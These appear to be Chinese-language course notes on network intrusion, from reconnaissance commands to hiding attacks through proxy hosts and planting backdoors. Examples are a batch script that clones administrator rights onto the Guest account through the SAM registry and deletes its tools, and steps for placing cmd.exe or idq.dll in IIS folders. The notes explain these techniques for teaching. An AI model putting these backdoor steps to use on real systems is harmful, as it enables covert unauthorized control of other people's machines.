
攻击目的是指想要给受侵者造成什么样的后果
常见的有破坏型和入侵型两种
搜集尽量多的关于攻击目标的信息
这些信息包括公开的信息和主动探测的信息
Tracert 命令探测网络结构
whois协议 搜集信息
获取目标主机上提供了哪些服务、相应端口是否开放、各服务所使用的软件版本类型

在知道了目标主机开放的服务之后,可以连接这些服务
然后根据连接过程中的返回消息,分析目标主机的操作系统


一般借助软件如Nessus、X-Scan等综合型漏洞检测工具、wVS等专用型漏洞检测工具等自动分析

ping命令是入侵者经常使用的网络命令,该命令用于测试网络连接性,通过发送特定形式的ICMP包来请求主机的回应,进而获得主机的一些属性
ping [-t] [-a][-l][-n count][-i TTL]
参数说明
| 参数 | 说明 |
|---|---|
| -t | 一直ping下去,直到按下Ctrl+C组合键结束 |
| -a | ping 的同时把IP地址转换成主机名 |
| -l | 指定数据包的大小,默认为32个字节,最大为65527 |
| -f | 在数据包中发送“不要分段”标志,数据包不会被路由设备分段 |
| -n count | 设定ping的次数 |
| -i TTL | 设置ICMP包的生存时间(指ICMP包能够传到临近的第几个节点) |
ping192.168.1.1“Reply from 192.168.1.1: bytestime<10ms tl=62” 目标主机有响应,说明192.168.1.1这台主机是活动的"Request timed out.” 则目标主机不是活动的,即目标主机不在线或安装有网络防火墙,这样的主机是不容易入侵的| 操作系统 | 默认TTL返回值 |
|---|---|
| UNIX类 | 255 |
| Windows95 | 32 |
| Windows NT/2000/2003 | 128 |
| Compap Tru64 5.0 | 64 |
在一般情况下黑客是如何得到目标IP地址和目标主机的地理位置的呢?
① 由域名得到网站IP地址
例如,黑客想知道百度服务器的P地址,可以在MS-DOS中键入
“ping www.baidu.com' 命令

可以看出,www.baidu.com对应的IP地址为 202.108.22.43
同样以百度服务器为例,在MS-DOS中键入
“nslookup www.baidu.com” 命令,回车后等到域名查询结果

Addresses后面列出的就是www.baidu.com所使用的Web服务器群里的IP
上面介绍的是黑客经常使用的两种最基本方法
此外,还有一些软件(如Lansee)附带域名转换P的功能,实现起来更简单,功能更强大
从这两种方法中可以看出:
② 由IP得到目标主机的地理位置
因此在这里介绍一个能查询到IP数据库的网站
网站一: http://ip.loveroot.com

例如,要查询202.108.22.5(百度的P)的物理地址,可以在图中的“IP地址”右面的文本框输入“202.108.22.5”,然后单击“查询”按钮,就会得到如图所示的查询结果

netstat命令有助于了解网络的整体使用情况,它可以显示当前正在活动的网络连接的详细信息,如采用的协议类型、当前主机与远端相连主机(一个或多个)的IP地址以及它们之间的连接状态等
netstat [-a][-e][-n][-s][-p proto][-r][interval]
参数说明
| 参数 | 说明 |
|---|---|
| -a | 显示所有主机的端口号 |
| -e | 显示以太网统计信息,该参数可以与-s选项结合使用 |
| -n | 以数字表格形式显示地址和端口 |
| -p proto | 显示特定的协议的具体使用信息 |
| -r | 显示本地路由表的内容 |
| -s | 显示每个协议的使用状态(包括TCP、UDP、IP) |
| interval | 重新显示所选的状态,每次显示之间的间隔数(单位秒) |
nbtstat命令用于显示本地计算机和远程计算机的基于TCP/IP (NetBT)的NetBIOS 统计资料、NetBIOS名称表和NetBIOS名称缓存
nbtstat可以刷新NetBIOS名称缓存和注册的Windows Internet名称服务(WINS)名称。使用不带参数的nbtstat显示帮助
nbtstat [-a remotename] [-A IPaddress] [-c][-n][-r][-R][-RR] [-s][-S][Interval]
参数说明
| 参数 | 说明 |
|---|---|
| -a remotename | -a remotename显示远程计算机的NetBIOS名称表,其中,remotename是远程计算机的NetBIOS计算机名称 |
| -A IPaddress | -A IPaddress显示远程计算机的NetBIOS名称表,其名称由远程计算机的P地址指定(以小数点分隔) |
| -c | 显示NetBIOS名称缓存内容、NetBIOS名称表及其解析的各个地址 |
| -n | 显示本地计算机的NetBIOS名称表 |
| -r | 显示NetBIOS名称解析统计资料 |
| -R | 清除NetBIOS名称缓存的内容,并从Lmhosts文件中重新加载带有#PRE标记的项目 |
| -RR | 重新释放并刷新通过WINS注册的本地计算机的NetBIOS名称 |
| -s | 显示NetBIOS客户和服务器会话,并试图将目标P地址转化为名称 |
| -S | 显示NetBIOS客户和服务器会话,只通过P地址列出远程计算机 |
| Interval | 重新显示选择的统计资料,可以中断每个显示之间的Interval 中指定的秒数。如果省略该参数,nbtstat将只显示一次当前的配置信息 |
- 注册人的姓名
- 注册人的E-mail,联系电话,传真等
- 注册机构、通信地址、邮编
- 注册有效时间、失效时间
可以通过以下几个网站来查询域名注册信息
中国互联网络信息中心是比较权威的机构,记录着所有以cn为结尾的域名注册信息

中国万网,号称是中国最大的域名和网站托管服务提供商,不仅提供.cn的域名注册信息,而且还有.com、.net 等
美国的上市公司要求在美国证券交易委员会(Security and Exchange Commission,SEC)登记,这些信息可以通过EDGAR数据库进行访问,地址 http://www.sec.gov/edgar.shtml
一般来说,网络的基本结构如下:

对于Windows平台,使用相关工具可以大体推断目标网络的基本结构。
- VisualRoute是图形化的路由跟踪工具
- 它是为了方便网管分析故障节点而设计的
- 可以使用专门的VisualRoute 软件
- 也可以到
http:/www.linkwan.com/vr使用该网站提供的VisualRoute 功能

tracert是路由跟踪命令,通过该命令的返回结果,可以获得本地到达目标主机所经过的网络设备
tracert [-d] [-h maximum hops] [-j host-list][-w timeout]target _name
参数说明
| 参数 | 说明 |
|---|---|
| -d | 不需要把IP地址转换成域名 |
| -h maximum _hops | 允许跟踪的最大跳跃数 |
| -j host-list | 经过的主机列表 |
| -w timeout | 每次回复的最大允许延时 |
这里提及的共享资源是指在Windows系统中的“共享磁盘”、“共享文件夹”、“共享文件”、“共享打印机”等。对于一般的共享,下面都会有个“托手”的标志,而对于以“$”结尾的共享却没有“托手”标志,属于隐藏共享
- 条件一:需要有足够的权限
- 条件二:已安装“Microsoft 网络文件和打印机共享”组件
- 条件三:已安装NetBEUI协议。如果没有安装NetBEUI协议,那么只能使用IP地址来互相访问共享资源如果安装了NetBEUI协议,便可以在同一局域网内使用主机名互相访问共享资源
如果满足上述条件,就可以在计算机上建立“共享资源”了。
Ipscan可以判断目标网段内有无活动主机。其中,红色显示的是不在线主机,蓝色显示的是活动主机,最后面显示的是主机名
Legion可以实现对共享资源的扫描,然后将共享资源映射到本地
Lansee可以对局域网中的主机进行扫描,并获得局域网内的共享资源
通过前面的介绍可知,如果共享资源设置不当,极有可能导致计算机被入侵者控制
可以通过以下几条安全解决方案来保证共享资源的安全
- 所谓“隐藏入侵”,是指入侵者利用其他计算机代替自己执行扫描、漏洞溢出、连接建立、远程控制等操作
- 入侵者们把这种代替他们完成入侵任务的计算机称为“肉鸡”
- 在隐藏技术中必然涉及到入侵者将文件传输到“肉鸡”中并隐藏的问题
- IPCS文件传输:使用命令行或映射网络驱动器方式
- FTP传输
- ·打包传输:将大量的文件进行压缩后再传送
- ·简单隐藏:利用attrib命令为文件添加“隐藏”和“系统”属性
- 利用专用文件夹隐藏:利用隐藏工具 SFind.exe将文件隐藏到系统专用文件夹

如图所示,入侵者通过跳板一、跳板二与远程主机/服务器建立连接,可以看出,在该攻击模型中,与远程主机/服务器直接接触的只有“跳板二”主机,因此,即使入侵行为被远程主机/服务器发觉,也能够直接查出只是“跳板二”主机,入侵者主机没有直接暴露给远程主机/服务器,实现了入侵中的隐身
从入侵者角度来看,后面分为账号后门、漏洞后门和木马后门
- 克隆帐号是通过修改注册表的SAM来实现的
- SAM (Security Account Manager)是专门用来管理Windows系统中账号的数据库,里面存放了一个账号所有的属性,包括账号的配置文件路径、账号权限、账号密码等
要修改SAM,经常需要使用工具PSU.exe
使用方式是: psu[参数选项]
克隆账号的步骤如下:
(1) 修改SAM
步骤一
打开注册表编辑器,可以看到,SAM一般是无法进行修改的。如果想修改,必须提升权限

步骤二
通过进程管理器查看System进程,并记录该进程PID,Windows2000一般为8

步骤三
使用psu.exe提升权限

步骤四
查看SAM中的账号信息,其中 Users\Names下有所有账号列表,在 User键下,以十六进制数字为名的键记录着账号的权限、密码等配置
步骤五
克隆账号,就是把Guest 账号的权限克隆为管理员权限
步骤六
禁用Guest账号

步骤七
查看Guest账号
使用的命令:
net user guest
net localgroup administrators

(2) 命令行方式克隆账号
使用命令行方式克隆账号需要工具
- reg.exe:命令行下的注册表编辑工具
- psu.exe:权限提升工具
- pslist.exe:查看远程主机进程
psu -p "regedit /s delf.reg”-i %1
psu -p "reg copy hklm\.SAM\SAMIDomains\Account\Users\000001F4\fhklm\SAM\SAM Domains\Account\Users1000001F5\f'-i %1
net user guest /active:yes
net user guest 123456789
net user guest /active:no
del delf.reg
del reg.exe
del psu.exe
del backdoor.bat
步骤二
使用pslist.exe查看远程主机的System进程PID
使用命令为“pslist llip -u用户名-p 密码”
步骤三
上传 backdoor.bat,运行批处理进行账号克隆
步骤四
建立IPCS连接进行验证,退出
- 通过前面介绍的服务器上IIS的 Unicode、.ida&.idq等漏洞
- 入侵者能够毫不费力地远程控制服务器的操作系统
- 实际上入侵者不仅能够通过漏洞实现最初的入侵,还能够通过制造漏洞来留下系统的后门
- 步骤一:找出Web根目录;
- 步骤二:拷贝cmd.exe到IIS目录中,一般可放在IIS的Scripts 文件夹中
- 步骤三:使用文件隐藏方法隐藏文件;
- 步骤四:验证Unicode后门
- 步骤一:把 idq.dll 传入远程服务器的Scripts目录中
- 步骤二:隐藏后门文件;
- 步骤三:利用idq或ida漏洞进行入侵